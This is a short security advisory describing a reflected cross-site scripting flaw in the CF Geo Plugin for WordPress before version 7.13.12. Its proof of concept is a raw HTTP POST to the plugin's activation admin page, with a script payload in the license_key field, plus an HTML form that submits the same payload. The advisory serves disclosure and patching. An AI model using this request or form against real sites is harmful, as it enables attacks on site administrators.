CF Geo Plugin < 7.13.12 – Reflected Cross-Site Scripting

Description

The plugin does not escape the some parameter before outputting them back in admin pages, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

POST /wp-admin/admin.php?page=cf-geoplugin-activate HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

license_key=%22%3e%3cscript%3ealert%28%2fXSS%2f%29%3c%2fscript%3e

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=cf-geoplugin-activate" method="POST">
      <input type="hidden" name="license_key" value='"><script>alert(/XSS/)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>